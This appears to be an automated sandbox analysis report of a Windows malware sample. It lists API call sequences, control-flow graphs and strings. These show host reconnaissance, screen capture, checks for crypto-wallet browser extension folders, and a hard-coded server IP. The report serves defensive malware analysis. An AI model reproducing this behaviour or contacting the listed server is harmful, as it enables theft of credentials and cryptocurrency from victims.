6c3714fc 112 API calls 4 library calls 110984->111124 110986 6c366a2e 110987 6c366a60 110986->110987 110988 6c3d1f84 _sprintf 98 API calls 110986->110988 111126 6c371ad3 113 API calls 3 library calls 110987->111126 110990 6c366a51 110988->110990 111125 6c3714fc 112 API calls 4 library calls 110990->111125 110991 6c366a6b 110993 6c3d1f84 _sprintf 98 API calls 110991->110993 110994 6c366a86 110993->110994 111127 6c3714fc 112 API calls 4 library calls 110994->111127 111010 6c366b6d _memset 110996->111010 110997 6c366e54 111139 6c362975 110997->111139 111001 6c3d1f75 __input_s_l 5 API calls 111002 6c35410e 111001->111002 111012 6c3d2e33 111002->111012 111005 6c3d1f84 98 API calls _sprintf 111005->111010 111006 6c371ad3 113 API calls 111006->111010 111010->110997 111010->111005 111010->111006 111011 6c3714fc 112 API calls 111010->111011 111166 6c370e43 62 API calls 111010->111166 111167 6c37070e 103 API calls 111010->111167 111168 6c373c28 113 API calls 2 library calls 111010->111168 111169 6c371c1e 113 API calls 111010->111169 111170 6c37173a 112 API calls 111010->111170 111171 6c367763 113 API calls 2 library calls 111010->111171 111011->111010 111181 6c3d2cf3 62 API calls 5 library calls 111012->111181 111014 6c3d2e44 111014->110853 111182 6c3f734c 111015->111182 111017 6c353398 CreateMutexA 111018 6c3533b1 GetLastError 111017->111018 111019 6c3533ab 111017->111019 111018->111019 111021 6c3533be 111018->111021 111020 6c3d2e33 62 API calls 111019->111020 111020->111018 111022 6c3e0ff1 __CxxThrowException@8 KiUserExceptionDispatcher 111021->111022 111023 6c3533d6 111022->111023 111183 6c35329d GetModuleFileNameA 111023->111183 111025 6c3533fb 111025->111025 111026 6c353417 CreateThread CreateFileA GetFileSize 111025->111026 111185 6c3d1f6a 111026->111185 111226 6c35334b 111026->111226 111028 6c35346a ReadFile 111029 6c353491 CloseHandle 111028->111029 111030 6c353481 CloseHandle 111028->111030 111031 6c3d1f6a 78 API calls 111029->111031 111032 6c353490 111030->111032 111033 6c3534a3 _memmove 111031->111033 111032->111029 111034 6c3534ba HeapCreate HeapAlloc 111033->111034 111201 6c3ee020 111034->111201 111037->110850 111038->110841 111040 6c3747e5 111039->111040 111041 6c3d1f84 _sprintf 98 API calls 111040->111041 111058 6c3747ff 111041->111058 111042 6c374a8f 111044 6c374a93 111042->111044 111045 6c374ac0 111042->111045 111043 6c3d1f84 _sprintf 98 API calls 111046 6c37484b GetModuleFileNameA 111043->111046 111047 6c374abe 111044->111047 111048 6c3d1f84 _sprintf 98 API calls 111044->111048 111045->111047 111049 6c3d1f84 _sprintf 98 API calls 111045->111049 111046->111058 111050 6c3d1f75 __input_s_l 5 API calls 111047->111050 111051 6c374ab0 111048->111051 111052 6c374ae0 111049->111052 111053 6c374af8 111050->111053 111068 6c371814 99 API calls 2 library calls 111051->111068 111069 6c3d28b7 98 API calls 5 library calls 111052->111069 111053->110874 111056 6c3d330e 95 API calls __wgetenv 111056->111058 111057 6c3d1f84 98 API calls _sprintf 111057->111058 111058->111042 111058->111043 111058->111045 111058->111056 111058->111057 111059 6c3d24fa 139 API calls 111058->111059 111059->111058 111060->110877 111061->110880 111062->110890 111063->110891 111064->110891 111065->110893 111066->110893 111067->110893 111068->111047 111069->111047 111070->110904 111071->110898 111072->110896 111073->110917 111074->110917 111076->110934 111077->110934 111078->110934 111079->110946 111080->110946 111081->110946 111082->110952 111083->110952 111084->110952 111085->110950 111086->110950 111087->110950 111088->110959 111090 6c361eee 111089->111090 111091 6c361efd 111089->111091 111129 6c3714fc 112 API calls 4 library calls 111090->111129 111093 6c361ef8 111091->111093 111130 6c37173a 112 API calls 111091->111130 111095 6c3d1f75 __input_s_l 5 API calls 111093->111095 111097 6c362077 111095->111097 111096 6c361f10 111098 6c3d1f84 _sprintf 98 API calls 111096->111098 111097->110973 111099 6c361f31 111098->111099 111131 6c3714fc 112 API calls 4 library calls 111099->111131 111101 6c361fdb 111134 6c37173a 112 API calls 111101->111134 111103 6c361f3c 111103->111101 111105 6c3714fc 112 API calls 111103->111105 111115 6c3d1f84 _sprintf 98 API calls 111103->111115 111132 6c37173a 112 API calls 111103->111132 111133 6c371ad3 113 API calls 3 library calls 111103->111133 111104 6c36205b 111137 6c37173a 112 API calls 111104->111137 111105->111103 111106 6c361fe4 111106->111104 111114 6c3d1f84 _sprintf 98 API calls 111106->111114 111116 6c3714fc 112 API calls 111106->111116 111135 6c37173a 112 API calls 111106->111135 111136 6c371ad3 113 API calls 3 library calls 111106->111136 111110 6c362062 111138 6c371ad3 113 API calls 3 library calls 111110->111138 111114->111106 111115->111103 111116->111106 111117->110969 111118->110969 111119->110969 111120->110969 111121->110976 111122->110980 111123->110982 111124->110986 111125->110987 111126->110991 111127->110964 111128->110962 111129->111093 111130->111096 111131->111103 111132->111103 111133->111103 111134->111106 111135->111106 111136->111106 111137->111110 111138->111093 111140 6c36299a 111139->111140 111141 6c36298b 111139->111141 111165 6c362995 111140->111165 111173 6c37173a 112 API calls 111140->111173 111172 6c3714fc 112 API calls 4 library calls 111141->111172 111144 6c3d1f75 __input_s_l 5 API calls 111146 6c362a97 111144->111146 111145 6c3629b0 111147 6c3d1f84 _sprintf 98 API calls 111145->111147 111146->111001 111148 6c3629eb 111147->111148 111174 6c3714fc 112 API calls 4 library calls 111148->111174 111150 6c3629f6 111151 6c362a20 111150->111151 111153 6c3d1f84 _sprintf 98 API calls 111150->111153 111176 6c37173a 112 API calls 111151->111176 111154 6c362a15 111153->111154 111175 6c3714fc 112 API calls 4 library calls 111154->111175 111157 6c3714fc 112 API calls 111160 6c362a27 111157->111160 111159 6c3d1f84 _sprintf 98 API calls 111159->111160 111160->111157 111160->111159 111161 6c362a7c 111160->111161 111177 6c37173a 112 API calls 111160->111177 111178 6c371ad3 113 API calls 3 library calls 111160->111178 111179 6c37173a 112 API calls 111161->111179 111163 6c362a83 111180 6c371ad3 113 API calls 3 library calls 111163->111180 111165->111144 111166->111010 111167->111010 111168->111010 111170->111010 111171->111010 111172->111165 111173->111145 111174->111150 111175->111151 111176->111160 111177->111160 111178->111160 111179->111163 111180->111165 111181->111014 111182->111017 111184 6c3532b5 __cftoa_l 111183->111184 111184->111025 111187 6c3d5dbc _malloc 111185->111187 111188 6c3d5de0 111187->111188 111189 6c3d5de2 std::exception::exception 111187->111189 111203 6c3d37d0 111187->111203 111188->111028 111190 6c3d5e20 111189->111190 111217 6c3db484 72 API calls __cinit 111189->111217 111218 6c3e0f00 62 API calls std::exception::operator= 111190->111218 111192 6c3d5e2a 111193 6c3e0ff1 __CxxThrowException@8 KiUserExceptionDispatcher 111192->111193 111195 6c3d5e3b IsDebuggerPresent 111193->111195 111219 6c3e103d 111195->111219 111198 6c3d5f09 SetUnhandledExceptionFilter UnhandledExceptionFilter 111199 6c3d5f2e GetCurrentProcess TerminateProcess 111198->111199 111200 6c3d5f26 __call_reportfault 111198->111200 111199->111028 111200->111199 111202 6c3534e1 GetDC EnumObjects 111201->111202 111202->110858 111204 6c3d384d _malloc 111203->111204 111210 6c3d37de _malloc 111203->111210 111225 6c3d6fbc 62 API calls __getptd_noexit 111204->111225 111207 6c3d380c RtlAllocateHeap 111207->111210 111216 6c3d3845 111207->111216 111209 6c3d37e9 111209->111210 111220 6c3db831 62 API calls 2 library calls 111209->111220 111221 6c3db682 62 API calls 7 library calls 111209->111221 111222 6c3d2b5e GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 111209->111222 111210->111207 111210->111209 111211 6c3d3839 111210->111211 111214 6c3d3837 111210->111214 111223 6c3d6fbc 62 API calls __getptd_noexit 111211->111223 111224 6c3d6fbc 62 API calls __getptd_noexit 111214->111224 111216->111187 111217->111190 111218->111192 111219->111198 111220->111209 111221->111209 111223->111214 111224->111216 111225->111216 111232 6c3532f1 RegisterClassA CreateWindowExA 111226->111232 111228 6c353358 111229 6c353376 GetMessageA 111228->111229 111230 6c353383 111229->111230 111231 6c353362 TranslateMessage DispatchMessageA 111229->111231 111231->111229 111232->111228

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 3d85bf0-3d85c77 call 3d9abd2 call 3da53e0 * 3 gethostname gethostbyname 9 3d85d1c-3d85e54 MultiByteToWideChar * 2 GetLastInputInfo GetTickCount wsprintfW MultiByteToWideChar * 2 call 3d88990 GetSystemInfo wsprintfW call 3d88150 call 3d883e0 GetForegroundWindow 0->9 10 3d85c7d-3d85cc4 inet_ntoa call 3d9bacc * 2 0->10 24 3d85e69-3d85e74 9->24 25 3d85e56-3d85e63 GetWindowTextW 9->25 10->9 19 3d85cc6-3d85cc8 10->19 21 3d85cd0-3d85d1a inet_ntoa call 3d9bacc * 2 19->21 21->9 26 3d85e7d-3d85e9e lstrlenW call 3d88270 24->26 27 3d85e76 24->27 25->24 33 3d85eb0-3d85ed1 call 3d9ad41 26->33 34 3d85ea0-3d85ead call 3d9ad41 26->34 27->26 39 3d85eda-3d85efb lstrlenW call 3d88270 33->39 40 3d85ed3 33->40 34->33 43 3d85f0d-3d85f43 GetModuleHandleW GetProcAddress 39->43 44 3d85efd-3d85f0a call 3d9ad41 39->44 40->39 46 3d85f4d-3d85f51 GetSystemInfo 43->46 47 3d85f45-3d85f4b GetNativeSystemInfo 43->47 44->43 49 3d85f57-3d85f62 46->49 47->49 50 3d85f6e-3d85f73 49->50 51 3d85f64-3d85f6c 49->51 53 3d85f7a-3d85faf wsprintfW call 3d87f70 GetCurrentProcessId call 3d89770 call 3d87bc0 50->53 51->50 52 3d85f75 51->52 52->53 60 3d85fc1-3d85fce 53->60 61 3d85fb1-3d85fbf 53->61 62 3d85fcf-3d86000 call 3d9ad41 GetUserNameW 60->62 61->62 65 3d860f9-3d861ce call 3d87880 call 3d9b0d9 GetTickCount call 3d9bb39 call 3d9baa5 wsprintfW GetLocaleInfoW GetSystemDirectoryW GetCurrentHwProfileW 62->65 66 3d86006-3d86030 wsprintfW GetFileAttributesW 62->66 88 3d861d0-3d861f5 65->88 89 3d861f7-3d86216 65->89 68 3d86032-3d86034 66->68 69 3d86077-3d8609f wsprintfW GetFileAttributesW 66->69 68->69 71 3d86036-3d86072 call 3d9b0d9 68->71 69->65 72 3d860a1-3d860a3 69->72 71->69 72->65 75 3d860a5-3d860ad 72->75 78 3d860af-3d860d5 call 3d9b6fb 75->78 79 3d860d7-3d860f6 call 3d9b0d9 75->79 78->65 79->65 90 3d86217-3d86241 call 3d86260 call 3d83130 call 3d9a490 88->90 89->90 95 3d86246-3d8625b call 3d9a49b 90->95
                                          APIs
                                            • Part of subcall function 03D9ABD2: _malloc.LIBCMT ref: 03D9ABEC
                                          • _memset.LIBCMT ref: 03D85C2C
                                          • _memset.LIBCMT ref: 03D85C45
                                          • _memset.LIBCMT ref: 03D85C55
                                          • gethostname.WS2_32(?,00000032), ref: 03D85C63
                                          • gethostbyname.WS2_32(?), ref: 03D85C6D
                                          • inet_ntoa.WS2_32 ref: 03D85C85
                                          • _strcat_s.LIBCMT ref: 03D85C98
                                          • _strcat_s.LIBCMT ref: 03D85CB1
                                          • inet_ntoa.WS2_32 ref: 03D85CDA
                                          • _strcat_s.LIBCMT ref: 03D85CED
                                          • _strcat_s.LIBCMT ref: 03D85D06
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 03D85D33
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000002,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 03D85D47
                                          • GetLastInputInfo.USER32(?), ref: 03D85D54
                                          • GetTickCount.KERNEL32 ref: 03D85D5A
                                          • wsprintfW.USER32 ref: 03D85D8C
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 03D85D9F
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000296,00000000), ref: 03D85DB3
                                          • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 03D85E0A
                                          • wsprintfW.USER32 ref: 03D85E23
                                          • GetForegroundWindow.USER32 ref: 03D85E4C
                                          • GetWindowTextW.USER32(00000000,000006CE,000000FA), ref: 03D85E63
                                          • lstrlenW.KERNEL32(000008CC), ref: 03D85E84
                                          • lstrlenW.KERNEL32(00000994), ref: 03D85EE1
                                          • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 03D85F34
                                          • GetProcAddress.KERNEL32(00000000), ref: 03D85F3B
                                          • GetNativeSystemInfo.KERNEL32(?), ref: 03D85F49
                                          • GetSystemInfo.KERNEL32(?), ref: 03D85F51
                                          • wsprintfW.USER32 ref: 03D85F87
                                          • GetCurrentProcessId.KERNEL32 ref: 03D85F99
                                          • GetUserNameW.ADVAPI32(?,?), ref: 03D85FF8
                                          • wsprintfW.USER32 ref: 03D8601B
                                          • GetFileAttributesW.KERNEL32(?), ref: 03D86027
                                          • wsprintfW.USER32 ref: 03D8608A
                                          • GetFileAttributesW.KERNEL32(?), ref: 03D86096
                                          • GetTickCount.KERNEL32 ref: 03D86116
                                          • __time64.LIBCMT ref: 03D86125
                                          • __localtime64.LIBCMT ref: 03D8615C
                                          • wsprintfW.USER32 ref: 03D86195
                                          • GetLocaleInfoW.KERNEL32(00000800,00000002,00000F46,00000040), ref: 03D861AA
                                          • GetSystemDirectoryW.KERNEL32(00001184,00000032), ref: 03D861B9
                                          • GetCurrentHwProfileW.ADVAPI32(?), ref: 03D861C6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: wsprintf$Info$ByteCharMultiSystemWide_strcat_s$_memset$AttributesCountCurrentFileTickWindowinet_ntoalstrlen$AddressDirectoryForegroundHandleInputLastLocaleModuleNameNativeProcProcessProfileTextUser__localtime64__time64_mallocgethostbynamegethostname
                                          • String ID: %d min$1.0$2024. 9.12$AppEvents$C:\Users\%s\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcohilncbfahbmgdjkbpemcciiolgcge\$C:\Users\%s\AppData\Local\Google\Chrome\User Data\Default\Extensions\nkbihfbeogaeaoehlefnkodbefgpgknn\$GROUP$GetNativeSystemInfo$M$Network$O$REMARK$X$X86$X86 %s$kernel32.dll$t$x64$x86$|
                                          • API String ID: 1086322084-88797156
                                          • Opcode ID: 04d8380a4953b8d18868c01414df80e3155adf7e5ccb578cb4059147533a69a0
                                          • Instruction ID: 305e8320ff81ac7bdd670411e9b656b06541c30c503688887aa22c6e16d9ff0f
                                          • Opcode Fuzzy Hash: 04d8380a4953b8d18868c01414df80e3155adf7e5ccb578cb4059147533a69a0
                                          • Instruction Fuzzy Hash: 1102B5B2900205EFDB14EBA4DC45FEEB7B9FF44700F048659F519A7280EB70A658CBA5
                                          APIs
                                          • CreateMutexW.KERNEL32(00000000,00000000,2024. 9.12), ref: 03D86796
                                          • GetLastError.KERNEL32 ref: 03D8679E
                                          • Sleep.KERNEL32(000003E8), ref: 03D867B5
                                          • CreateMutexW.KERNEL32(00000000,00000000,2024. 9.12), ref: 03D867C0
                                          • GetLastError.KERNEL32 ref: 03D867C2
                                          • _memset.LIBCMT ref: 03D867E9
                                          • lstrlenW.KERNEL32(?), ref: 03D867F6
                                          • lstrcmpW.KERNEL32(?,03DB5F60), ref: 03D8681D
                                          • Sleep.KERNEL32(000003E8), ref: 03D86828
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 03D86835
                                          • GetConsoleWindow.KERNEL32 ref: 03D8683F
                                          • _memset.LIBCMT ref: 03D868CD
                                          • lstrlenW.KERNEL32(?,74DEE010,74DF2FA0,74DF0F00), ref: 03D868DD
                                          • lstrcmpW.KERNEL32(?,03DB5F60), ref: 03D86912
                                          • RegOpenKeyExW.ADVAPI32 ref: 03D86941
                                          • RegQueryValueExW.ADVAPI32(?,Regex,00000000,?,00000000,?), ref: 03D8696B
                                          • _memset.LIBCMT ref: 03D86987
                                          • RegQueryValueExW.ADVAPI32(?,Regex,00000000,?,00000000,?,?,?,?,?), ref: 03D869A5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _memset$CreateErrorLastMutexQuerySleepValuelstrcmplstrlen$ConsoleHandleModuleOpenWindow
                                          • String ID: 2024. 9.12$Regex$Uopen$key$open
                                          • API String ID: 615606947-542576200
                                          • Opcode ID: 4a392758e6bdeff63860f94ca7075385f6717f9a969d0e2f16ed8b9d7bce668e
                                          • Instruction ID: 5d3e0a96ea78bec6a500c0d2c8092d9d5ad0024bd402d42add44aada6066e6ea
                                          • Opcode Fuzzy Hash: 4a392758e6bdeff63860f94ca7075385f6717f9a969d0e2f16ed8b9d7bce668e
                                          • Instruction Fuzzy Hash: 11925AB1908380DFD734EF28D884A9BFBE5FF89714F54492EE5898B251D730A544CBA2

                                          Control-flow Graph

                                          APIs
                                          • GetDesktopWindow.USER32 ref: 03D9695F
                                          • GetDC.USER32(00000000), ref: 03D9696C
                                          • CreateCompatibleDC.GDI32(00000000), ref: 03D96972
                                          • GetDC.USER32(00000000), ref: 03D9697D
                                          • GetDeviceCaps.GDI32(00000000,00000008), ref: 03D9698A
                                          • GetDeviceCaps.GDI32(00000000,00000076), ref: 03D96992
                                          • ReleaseDC.USER32(00000000,00000000), ref: 03D969A3
                                          • GetSystemMetrics.USER32(0000004E), ref: 03D969C8
                                          • GetSystemMetrics.USER32(0000004F), ref: 03D969F6
                                          • GetSystemMetrics.USER32(0000004C), ref: 03D96A48
                                          • GetSystemMetrics.USER32(0000004D), ref: 03D96A5D
                                          • CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 03D96A76
                                          • SelectObject.GDI32(?,00000000), ref: 03D96A84
                                          • SetStretchBltMode.GDI32(?,00000003), ref: 03D96A90
                                          • GetSystemMetrics.USER32(0000004F), ref: 03D96A9D
                                          • GetSystemMetrics.USER32(0000004E), ref: 03D96AB0
                                          • StretchBlt.GDI32(?,00000000,00000000,?,00000000,?,?,?,00000000,?,00000000), ref: 03D96AD7
                                          • _memset.LIBCMT ref: 03D96B4A
                                          • GetDIBits.GDI32(?,?,00000000,00000000,?,00000028,00000000), ref: 03D96B67
                                          • _memset.LIBCMT ref: 03D96B7F
                                          • _memmove.LIBCMT ref: 03D96BB9
                                            • Part of subcall function 03D9ABD2: _malloc.LIBCMT ref: 03D9ABEC
                                          • DeleteObject.GDI32(?), ref: 03D96BF3
                                          • DeleteObject.GDI32(?), ref: 03D96BFD
                                          • ReleaseDC.USER32(00000000,?), ref: 03D96C09
                                          • _memmove.LIBCMT ref: 03D96CA3
                                          • DeleteObject.GDI32(?), ref: 03D96CAF
                                          • DeleteObject.GDI32(?), ref: 03D96CB9
                                          • ReleaseDC.USER32(00000000,?), ref: 03D96CC5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MetricsSystem$Object$Delete$Release$CapsCompatibleCreateDeviceStretch_memmove_memset$BitmapBitsDesktopModeSelectWindow_malloc
                                          • String ID: ($6$gfff$gfff
                                          • API String ID: 1260665799-713438465
                                          • Opcode ID: edee0e0ab52bb3215aa8b8ae94bc522590de270c444c1b3dad03566e425fd8b7
                                          • Instruction ID: e2328644d5abbfe7bc93eb94313ec48fa55425e0f4dc9afd7aa0cd55aa2862de
                                          • Opcode Fuzzy Hash: edee0e0ab52bb3215aa8b8ae94bc522590de270c444c1b3dad03566e425fd8b7
                                          • Instruction Fuzzy Hash: FDD15DB6E00308EFDB14EFA5E885A9EBBB9FF44700F14452AF505AB340D774A915CBA1

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 496 3d98aa0-3d98b02 call 3d9bc3f Sleep 499 3d98b2b 496->499 500 3d98b04-3d98b29 call 3d9abd2 call 3d9aef4 CloseHandle 496->500 502 3d98b31-3d98b37 499->502 500->502 504 3d98b39 call 3d88b20 502->504 505 3d98b3e-3d98bc4 GetLocalTime wsprintfW SetUnhandledExceptionFilter call 3d9aef4 CloseHandle call 3d9aef4 CloseHandle call 3d9abd2 502->505 504->505 515 3d98bd3 505->515 516 3d98bc6-3d98bd1 call 3d82c60 505->516 518 3d98bd7-3d98bf1 call 3d9abd2 515->518 516->518 522 3d98bff 518->522 523 3d98bf3-3d98bf4 call 3d943f0 518->523 525 3d98c03-3d98c0e 522->525 526 3d98bf9-3d98bfd 523->526 527 3d98c10-3d98c1c call 3d812a0 525->527 526->525 530 3d98c1e-3d98c64 call 3d9ad41 * 2 527->530 531 3d98c66-3d98ca7 call 3d9ad41 * 2 527->531 540 3d98cad-3d98cbd 530->540 531->540 541 3d98cff-3d98d07 540->541 542 3d98cbf-3d98cf9 call 3d812a0 call 3d9ad41 * 2 540->542 543 3d98d09-3d98d0b 541->543 544 3d98d0f-3d98d16 541->544 542->541 543->544 546 3d98d18-3d98d22 544->546 547 3d98d24-3d98d28 544->547 550 3d98d2e-3d98d34 546->550 547->550 552 3d98d73-3d98d9b call 3d9bc3f call 3d82d70 550->552 553 3d98d36-3d98d50 EnumWindows 550->553 560 3d98dad-3d98e59 call 3d9bc3f CreateEventA call 3d9ad41 call 3d97740 552->560 561 3d98d9d-3d98da8 Sleep 552->561 553->552 555 3d98d52-3d98d71 Sleep EnumWindows 553->555 555->552 555->555 569 3d98e64-3d98e6a 560->569 561->527 570 3d98e6c-3d98ea0 Sleep RegOpenKeyExW 569->570 571 3d98ec5-3d98ed9 call 3d85bf0 569->571 573 3d98ebe-3d98ec3 570->573 574 3d98ea2-3d98eb8 RegQueryValueExW 570->574 575 3d98ede-3d98ee4 571->575 573->569 573->571 574->573 576 3d98f17-3d98f1d 575->576 577 3d98ee6-3d98f12 CloseHandle 575->577 578 3d98f3d 576->578 579 3d98f1f-3d98f3b call 3d9aef4 576->579 577->527 582 3d98f41 578->582 579->582 584 3d98f43-3d98f4a 582->584 585 3d98fba-3d98fcd 584->585 586 3d98f4c-3d98f5b Sleep 584->586 590 3d98fdf-3d99019 call 3d9bc3f Sleep CloseHandle 585->590 591 3d98fcf-3d98fd9 WaitForSingleObject CloseHandle 585->591 586->584 587 3d98f5d-3d98f64 586->587 587->585 589 3d98f66-3d98f78 587->589 594 3d98f8a-3d98fb5 Sleep CloseHandle 589->594 595 3d98f7a-3d98f84 WaitForSingleObject CloseHandle 589->595 590->527 591->590 594->527 595->594
                                          APIs
                                            • Part of subcall function 03D9BC3F: __fassign.LIBCMT ref: 03D9BC35
                                          • Sleep.KERNEL32(00000000), ref: 03D98AF4
                                          • CloseHandle.KERNEL32(00000000), ref: 03D98B27
                                          • GetLocalTime.KERNEL32(?), ref: 03D98B43
                                          • wsprintfW.USER32 ref: 03D98B7A
                                          • SetUnhandledExceptionFilter.KERNEL32(03D88AB0), ref: 03D98B88
                                          • CloseHandle.KERNEL32(00000000), ref: 03D98BA1
                                          • CloseHandle.KERNEL32(00000000), ref: 03D98BB6
                                            • Part of subcall function 03D9ABD2: _malloc.LIBCMT ref: 03D9ABEC
                                          • EnumWindows.USER32(03D864F0,?), ref: 03D98D4A
                                          • Sleep.KERNEL32(00004E20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 03D98D57
                                          • EnumWindows.USER32(03D864F0,?), ref: 03D98D6B
                                          • Sleep.KERNEL32(00000BB8), ref: 03D98DA2
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 03D98DEE
                                          • Sleep.KERNEL32(00000FA0), ref: 03D98E71
                                          • RegOpenKeyExW.KERNEL32(80000001,Console,00000000,00020019,?), ref: 03D98E98
                                          • RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 03D98EB8
                                          • CloseHandle.KERNEL32(?), ref: 03D98F0A
                                          • Sleep.KERNEL32(000003E8,?,?), ref: 03D98F51
                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 03D98F7D
                                          • CloseHandle.KERNEL32(?,?,?), ref: 03D98F84
                                          • Sleep.KERNEL32(000003E8,?,?), ref: 03D98F8F
                                          • CloseHandle.KERNEL32(?), ref: 03D98FAD
                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 03D98FD2
                                          • CloseHandle.KERNEL32(?,?,?), ref: 03D98FD9
                                          • Sleep.KERNEL32(00000000,?,?,?), ref: 03D98FF3
                                          • CloseHandle.KERNEL32(?), ref: 03D99011
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle$Sleep$EnumObjectSingleWaitWindows$CreateEventExceptionFilterLocalOpenQueryTimeUnhandledValue__fassign_mallocwsprintf
                                          • String ID: %4d.%2d.%2d-%2d:%2d:%2d$127.0.0.1$45.201.245.153$45.201.245.153$45.201.245.153$Console$IpDatespecial
                                          • API String ID: 4131110691-3578819082
                                          • Opcode ID: d3db9a8f0e8535772a38a391580e267dcdb8bf81ce93be409f2a2d7114c2ef20
                                          • Instruction ID: ce5400665dbe6c37c4ddb891a62ff7872ce27bd332981f486a6056183ff68a94
                                          • Opcode Fuzzy Hash: d3db9a8f0e8535772a38a391580e267dcdb8bf81ce93be409f2a2d7114c2ef20
                                          • Instruction Fuzzy Hash: 2FD1E2B2564342DFD760FF64D884E1BB7B5EB85B04F040A1EF19587385EB709508CB62
                                          APIs
                                          • std::locale::_Init.LIBCPMT ref: 03D87245
                                            • Part of subcall function 03D99EF6: __EH_prolog3.LIBCMT ref: 03D99EFD
                                            • Part of subcall function 03D99EF6: std::_Lockit::_Lockit.LIBCPMT ref: 03D99F13
                                            • Part of subcall function 03D99EF6: std::locale::_Locimp::_Locimp.LIBCPMT ref: 03D99F35
                                            • Part of subcall function 03D99EF6: std::locale::_Setgloballocale.LIBCPMT ref: 03D99F3F
                                            • Part of subcall function 03D99EF6: _Yarn.LIBCPMT ref: 03D99F55
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 03D8725D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: std::locale::_$LockitLockit::_std::_$H_prolog3InitLocimpLocimp::_SetgloballocaleYarn
                                          • String ID: Regex$Uopen$key
                                          • API String ID: 3373505166-3242728208
                                          • Opcode ID: 53eec328d6743a817cb97f6eb8c25ca1bc770c18f8e613ec4f6012d63ad604b8
                                          • Instruction ID: 30a036d46ae9d8bcd1edcdfca3fb477ea0a2b758f65e365b982ec07914ea02a9
                                          • Opcode Fuzzy Hash: 53eec328d6743a817cb97f6eb8c25ca1bc770c18f8e613ec4f6012d63ad604b8
                                          • Instruction Fuzzy Hash: 35F128B6908380DFD730EF68D884B9FF7E5BB89704F54492EE5898B251D730A544CB62

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1631 3d87f70-3d87fe3 call 3d99b72 GetCurrentProcessId wsprintfW call 3d87e40 call 3da53e0 GetVersionExW 1638 3d87fe9-3d87ff0 1631->1638 1639 3d880e6-3d880ec 1631->1639 1638->1639 1641 3d87ff6-3d87ffd 1638->1641 1640 3d88114-3d88121 wsprintfW 1639->1640 1643 3d88124-3d88126 1640->1643 1641->1639 1642 3d88003-3d88021 GetCurrentProcess OpenProcessToken 1641->1642 1642->1639 1644 3d88027-3d88047 GetTokenInformation 1642->1644 1645 3d88128-3d8812e call 3d9af94 1643->1645 1646 3d88131-3d88146 call 3d9a49b 1643->1646 1647 3d88049-3d88052 GetLastError 1644->1647 1648 3d880bb-3d880ce CloseHandle 1644->1648 1645->1646 1647->1648 1651 3d88054-3d8806b LocalAlloc 1647->1651 1653 3d880d0 1648->1653 1654 3d880f6-3d880fc 1648->1654 1651->1648 1658 3d8806d-3d8808d GetTokenInformation 1651->1658 1659 3d880ee-3d880f4 1653->1659 1660 3d880d2-3d880d4 1653->1660 1656 3d8810e-3d8810f 1654->1656 1657 3d880fe-3d88104 1654->1657 1656->1640 1657->1643 1661 3d88106-3d8810c 1657->1661 1662 3d880ae-3d880b5 LocalFree 1658->1662 1663 3d8808f-3d880ac 